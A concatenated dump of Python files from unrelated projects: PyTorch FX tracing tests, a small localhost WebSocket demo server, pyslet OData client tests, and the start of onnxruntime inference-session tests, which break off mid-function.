def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
@skipIfNoTorchVision
def test_cpatcher(self):
cnt = 0
def patched_impl(to_patch, args, kwargs):
nonlocal cnt
cnt += 1
return to_patch(*args, **kwargs)
c_patch_enabled = True
def patched_in(to_patch, args, kwargs):
nonlocal c_patch_enabled
try:
c_patch_enabled = False
r = patched_impl(to_patch, args, kwargs)
finally:
c_patch_enabled = True
return r
def trace_func(frame, action, arg):
if action == 'c_call':
if c_patch_enabled:
torch._C._fx.patch_function(arg, patched_in)
import torch
from torchvision.models.resnet import resnet18
rn = resnet18()
try:
sys.setprofile(trace_func)
rn(torch.rand(1, 3, 224, 224))
print("testing print patch")
finally:
sys.setprofile(None)
assert(cnt != 0)
def test_randn(self):
def f():
return torch.randn(3, 3)
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=False)
assert(all(i.target != torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
def run_getitem_target():
from torch.fx.symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
known_no_schema = {'stack', 'hstack', 'vstack', 'dstack', 'repeat', '__getitem__', 'linalg.multi_dot',
'polygamma'}
try:
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
except Exception as e:
assert op.name in known_no_schema
class TestFunctionalTracing(JitTestCase):
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": LEN_ERROR,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"hardshrink": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"pairwise_distance": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
}
# List of nn.functionals with Tensor inputs but not with type annotation
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable object like modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
# No signature or Object is not supported
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 9):
exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
def no(*args, **kwargs):
return False
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
setattr(torch.nn.functional, name, no)
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
if __name__ == '__main__':
run_tests()
|
ws-server.py | #!/usr/bin/env python
# USAGE: ./ws-server.py & python -m SimpleHTTPServer 8888
import socket, threading, time
def handle(s):
print repr(s.recv(4096))
s.send('''
HTTP/1.1 101 Web Socket Protocol Handshake\r
Upgrade: WebSocket\r
Connection: Upgrade\r
WebSocket-Origin: http://localhost:8888\r
WebSocket-Location: ws://localhost:8050/\r
WebSocket-Protocol: sample
'''.strip() + '\r\n\r\n')
time.sleep(1)
s.send('\x00hello\xff')
time.sleep(1)
s.send('\x00world\xff')
s.close()
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', 9876));
s.listen(1);
while 1:
t,_ = s.accept();
threading.Thread(target = handle, args = (t,)).start()
|
test_odata2_client.py | #! /usr/bin/env python
import decimal
import logging
import random
import threading
import time
import unittest
from wsgiref.simple_server import make_server, WSGIRequestHandler
from pyslet import rfc2396 as uri
from pyslet import rfc5023 as app
from pyslet.odata2 import core
from pyslet.odata2 import csdl as edm
from pyslet.odata2 import client
from pyslet.odata2.memds import InMemoryEntityContainer
from pyslet.odata2.server import Server
from test_odata2_core import DataServiceRegressionTests
HTTP_PORT = random.randint(1111, 9999)
def suite(prefix='test'):
loader = unittest.TestLoader()
loader.testMethodPrefix = prefix
return unittest.TestSuite((
loader.loadTestsFromTestCase(ODataTests),
loader.loadTestsFromTestCase(ClientTests),
loader.loadTestsFromTestCase(RegressionTests)
))
def load_tests(loader, tests, pattern):
"""Called when we execute this file directly.
This rather odd definition includes a larger number of tests,
including one starting "tesx" which hit the sample OData services on
the internet."""
# return suite('test')
return suite('tes')
ODATA_SAMPLE_SERVICEROOT = \
"http://services.odata.org/V2/Northwind/Northwind.svc/"
ODATA_SAMPLE_READWRITE = \
"http://services.odata.org/(S(readwrite))/OData/OData.svc/"
class ODataTests(unittest.TestCase):
def test_constants(self):
pass
class ClientTests(unittest.TestCase):
def tesx_constructor(self):
c = client.Client(ODATA_SAMPLE_SERVICEROOT)
self.assertTrue(isinstance(c, app.Client),
"OData client not an APP client")
self.assertTrue(isinstance(c.service, app.Service),
"Service document is present")
self.assertTrue(len(c.service.Workspace) == 1,
"Service not returning a single Workspace child")
self.assertTrue(len(c.service.Workspace[0].Collection) > 0,
"Workspace empty")
self.assertTrue(isinstance(c.serviceRoot, uri.URI),
"Service root should be a URI instance")
self.assertTrue(len(c.feeds) > 0,
"At least one feed loaded from service")
self.assertTrue("Products" in c.feeds,
"One feed called Products required")
self.assertTrue(isinstance(c.feeds["Products"], edm.EntitySet),
"Feeds map to entity sets")
def tesx_feed_entries(self):
c = client.Client(ODATA_SAMPLE_SERVICEROOT)
# now open a collection and iterate through it
names = set()
with c.feeds['Products'].open() as collection:
n = len(collection)
self.assertTrue(
n > 10, "Sample has more than 10 products (found %i)" % n)
for product in collection.itervalues():
names.add(product['ProductName'].value)
self.assertTrue(n == len(names))
scottish_long_breads = collection[68]
self.assertTrue(isinstance(scottish_long_breads['ProductID'],
edm.Int32Value))
self.assertTrue(scottish_long_breads['ProductID'].value == 68)
self.assertTrue(isinstance(scottish_long_breads['ProductName'],
edm.StringValue))
self.assertTrue(scottish_long_breads['ProductName'].value ==
"Scottish Longbreads")
self.assertTrue(isinstance(scottish_long_breads['SupplierID'],
edm.Int32Value))
self.assertTrue(scottish_long_breads['SupplierID'].value == 8)
self.assertTrue(isinstance(scottish_long_breads['CategoryID'],
edm.Int32Value))
self.assertTrue(scottish_long_breads['CategoryID'].value == 3)
self.assertTrue(isinstance(scottish_long_breads['QuantityPerUnit'],
edm.StringValue))
self.assertTrue(
scottish_long_breads['QuantityPerUnit'].value ==
"10 boxes x 8 pieces")
self.assertTrue(isinstance(scottish_long_breads['UnitPrice'],
edm.DecimalValue))
self.assertTrue(
scottish_long_breads['UnitPrice'].value.as_tuple() ==
decimal.Decimal("12.5000").as_tuple())
self.assertTrue(isinstance(scottish_long_breads['UnitsInStock'],
edm.Int16Value))
self.assertTrue(scottish_long_breads['UnitsInStock'].value == 6)
self.assertTrue(isinstance(scottish_long_breads['UnitsOnOrder'],
edm.Int16Value))
self.assertTrue(scottish_long_breads['UnitsOnOrder'].value == 10)
self.assertTrue(isinstance(scottish_long_breads['ReorderLevel'],
edm.Int16Value))
self.assertTrue(scottish_long_breads['ReorderLevel'].value == 15)
self.assertTrue(isinstance(scottish_long_breads['Discontinued'],
edm.BooleanValue))
self.assertFalse(scottish_long_breads['Discontinued'].value)
def tesx_orderby(self):
c = client.Client(ODATA_SAMPLE_SERVICEROOT)
with c.feeds['Products'].open() as collection:
collection.set_orderby(
core.CommonExpression.orderby_from_str("ProductName asc"))
first_value = None
last_value = None
for product in collection.itervalues():
last_value = product['ProductName'].value
if first_value is None:
first_value = last_value
self.assertTrue(
first_value == "Alice Mutton", "Bad first value: %s" % first_value)
self.assertTrue(
last_value == "Zaanse koeken", "Bad last value: %s" % last_value)
def tesx_filter(self):
c = client.Client(ODATA_SAMPLE_SERVICEROOT)
with c.feeds['Products'].open() as collection:
collection.set_filter(
core.CommonExpression.from_str(
"substringof('bread',ProductName)"))
self.assertTrue(len(collection) == 1)
product = collection.values()[0]
self.assertTrue(product['ProductName'] == "Scottish Longbreads")
scottish_long_breads = collection[68]
self.assertTrue(scottish_long_breads['ProductID'].value == 68)
try:
collection[17]
self.fail("Alice Mutton wasn't filtered")
except KeyError:
pass
def tesx_navigation(self):
c = client.Client(ODATA_SAMPLE_SERVICEROOT)
with c.feeds['Customers'].open() as collection:
customer = collection['ALFKI']
self.assertFalse(customer['Orders'].isExpanded)
with customer['Orders'].open() as orders:
self.assertTrue(len(orders) == 6, "Number of orders")
self.assertFalse(
isinstance(orders, edm.ExpandedEntityCollection))
# now test expansion
collection.set_expand({"Orders": None})
customer = collection['ALFKI']
self.assertTrue(customer['Orders'].isExpanded)
with customer['Orders'].open() as orders:
self.assertTrue(len(orders) == 6, "Number of orders")
self.assertTrue(
isinstance(orders, core.ExpandedEntityCollection))
class LoggingHandler(WSGIRequestHandler):
def log_message(self, format, *args):
logging.info(format, *args)
regressionServerApp = None
regressionTestsDone = False
def run_regression_server():
server = make_server(
'', HTTP_PORT, regressionServerApp, handler_class=LoggingHandler)
server.timeout = 10
logging.info("Serving HTTP on port %i... (timeout %s)", HTTP_PORT,
repr(server.timeout))
while not regressionTestsDone:
server.handle_request()
class RegressionTests(DataServiceRegressionTests):
def setUp(self): # noqa
global regressionServerApp
DataServiceRegressionTests.setUp(self)
self.container = InMemoryEntityContainer(
self.ds['RegressionModel.RegressionContainer'])
regressionServerApp = Server("http://localhost:%i/" % HTTP_PORT)
regressionServerApp.SetModel(self.ds.get_document())
t = threading.Thread(target=run_regression_server)
t.setDaemon(True)
t.start()
logging.info("OData Client/Server combined tests starting HTTP "
"server on localhost, port %i" % HTTP_PORT)
# yield time to allow the server to start up
time.sleep(2)
self.svcDS = self.ds
self.client = client.Client("http://localhost:%i/" % HTTP_PORT)
self.ds = self.client.model.DataServices
def tearDown(self): # noqa
global regressionTestsDone
DataServiceRegressionTests.tearDown(self)
regressionTestsDone = True
def test_all_tests(self):
self.run_combined()
if __name__ == "__main__":
logging.basicConfig(
level=logging.INFO, format="[%(thread)d] %(levelname)s %(message)s")
unittest.main()
|
onnxruntime_test_python.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# -*- coding: UTF-8 -*-
import unittest
import os
import numpy as np
import onnxruntime as onnxrt
import threading
class TestInferenceSession(unittest.TestCase):
def get_name(self, name):
if os.path.exists(name):
return name
rel = os.path.join("testdata", name)
if os.path.exists(rel):
return rel
this = os.path.dirname(__file__)
data = os.path.join(this, "..", "testdata")
res = os.path.join(data, name)
if os.path.exists(res):
return res
raise FileNotFoundError(
"Unable to find '{0}' or '{1}' or '{2}'".format(name, rel, res))
def run_model(self, session_object, run_options):
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = session_object.get_inputs()[0].name
res = session_object.run([], {input_name: x}, run_options=run_options)
output_expected = np.array(
[[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
def testModelSerialization(self):
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "TestModelSerialization"
so.optimized_model_filepath = "./PythonApiTestOptimizedModel.onnx"
onnxrt.InferenceSession(self.get_name("mul_1.onnx"), sess_options=so)
self.assertTrue(os.path.isfile(so.optimized_model_filepath))
def testGetProviders(self):
self.assertTrue(
'CPUExecutionProvider' in onnxrt.get_available_providers())
self.assertTrue('CPUExecutionProvider' in onnxrt.get_all_providers())
sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx"))
self.assertTrue('CPUExecutionProvider' in sess.get_providers())
def testSetProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx"))
# confirm that CUDA Provider is in list of registered providers.
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# reset the session and register only CPU Provider.
sess.set_providers(['CPUExecutionProvider'])
# confirm only CPU Provider is registered now.
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testInvalidSetProviders(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx"))
sess.set_providers(['InvalidProvider'])
self.assertTrue('[\'InvalidProvider\'] does not contain a subset of available providers' in str(
context.exception))
def testRunModel(self):
sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array(
[[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModelFromBytes(self):
with open(self.get_name("mul_1.onnx"), "rb") as f:
content = f.read()
sess = onnxrt.InferenceSession(content)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array(
[[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2(self):
sess = onnxrt.InferenceSession(self.get_name("matmul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModelMultipleThreads(self):
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "MultiThreadsTest"
sess = onnxrt.InferenceSession(
self.get_name("mul_1.onnx"), sess_options=so)
ro1 = onnxrt.RunOptions()
ro1.logid = "thread1"
t1 = threading.Thread(target=self.run_model, args=(sess, ro1))
ro2 = onnxrt.RunOptions()
ro2.logid = "thread2"
t2 = threading.Thread(target=self.run_model, args=(sess, ro2))
t1.start()
t2.start()
t1.join()
t2.join()
def testRunDevice(self):
device = onnxrt.get_device()
self.assertTrue('CPU' in device or 'GPU' in device)
def testRunModelSymbolicInput(self):
sess = onnxrt.InferenceSession(self.get_name("matmul_2.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
# Input X has an unknown dimension.
self.assertEqual(input_shape, ['None', 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
# Output X has an unknown dimension.
self.assertEqual(output_shape, ['None', 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
def testBooleanInputs(self):
sess = onnxrt.InferenceSession(self.get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=np.bool)
b = np.array([[True, False], [True, False]], dtype=np.bool)
# input1:0 is first in the protobuf, and input:0 is second
# and we maintain the original order.
a_name = sess.get_inputs()[0].name
self.assertEqual(a_name, "input1:0")
a_shape = sess.get_inputs()[0].shape
self.assertEqual(a_shape, [2, 2])
a_type = sess.get_inputs()[0].type
self.assertEqual(a_type, 'tensor(bool)')
b_name = sess.get_inputs()[1].name
self.assertEqual(b_name, "input:0")
b_shape = sess.get_inputs()[1].shape
self.assertEqual(b_shape, [2, 2])
b_type = sess.get_inputs()[0].type
self.assertEqual(b_type, 'tensor(bool)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(bool)')
output_expected = np.array(
[[True, False], [False, False]], dtype=np.bool)
res = sess.run([output_name], {a_name: a, b_name: b})
np.testing.assert_equal(output_expected, res[0])
def testStringInput1(self):
sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'],
dtype=np.str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testStringInput2(self):
sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx"))
x = np.array(['Olá', '你好', '여보세요', 'hello'],
dtype=np.unicode).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputBytes(self):
sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test']).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0].astype('|S8'))
def testInputObject(self):
sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'],
object).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputVoid(self):
sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test'],
np.void).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
expr = np.array([['this\x00\x00\x00\x00', 'is\x00\x00\x00\x00\x00\x00'],
['identity', 'test\x00\x00\x00\x00']], dtype=object)
np.testing.assert_equal(expr, res[0])
def testZipMapStringFloat(self):
sess = onnxrt.InferenceSession(
self.get_name("zipmap_stringfloat.onnx"))
x = np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0],
dtype=np.float32).reshape((2, 3))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(float)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Z")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(map(string,tensor(float)))')
output_expected = [{'class2': 0.0, 'class1': 1.0, 'class3': 3.0},
{'class2': 23.0, 'class1': 44.0, 'class3': 11.0}]
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testZipMapInt64Float(self):
sess = onnxrt.InferenceSession(self.get_name("zipmap_int64float.onnx"))
x = np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0],
dtype=np.float32).reshape((2, 3))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(float)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Z")
output_type = sess.get_outputs()[0].type
